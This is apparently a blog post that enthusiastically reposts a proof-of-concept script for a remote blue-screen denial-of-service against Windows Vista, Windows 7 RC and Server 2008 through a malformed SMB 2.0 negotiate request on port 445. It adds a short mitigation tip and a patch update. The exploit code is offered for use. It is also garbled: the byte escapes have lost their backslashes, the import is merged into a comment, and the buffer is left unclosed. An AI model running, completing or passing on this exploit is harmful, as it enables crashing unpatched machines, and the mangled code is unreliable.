Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.
Here’s the proof of concept. I’m going to keep a copy here just in case.
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> normal value should be "x00x00"
s = socket()
To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.
Ah! The good old days again.
== Update ==
Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.
Original Post: Microsoft Security Advisory 975497 Released
== End Update ==
Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.